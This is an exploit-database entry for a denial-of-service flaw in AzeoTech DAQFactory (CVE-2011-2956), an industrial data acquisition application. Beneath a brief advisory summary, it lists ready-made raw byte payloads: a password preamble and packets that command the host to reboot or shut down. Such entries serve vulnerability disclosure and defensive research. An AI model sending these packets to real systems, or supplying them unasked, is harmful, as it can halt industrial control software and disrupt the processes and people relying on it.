AzeoTech DaqFactory - Denial of Service

Author: Knud Erik Hojgaard
type: dos
platform: multiple
port: 
date_added: 2011-06-24  
date_updated: 2015-02-07  
verified: 1  
codes: CVE-2011-2956;OSVDB-73390  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 36007.txt  

source: https://www.securityfocus.com/bid/48955/info

AzeoTech DAQFactory is prone to a denial-of-service vulnerability.

Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.

Versions prior to DAQFactory 5.85 are vulnerable.


The following exploit requests are available:

preamble:
"\x01\x00\x09\x00CPassword\x00"

reboot:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"

shutdown:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"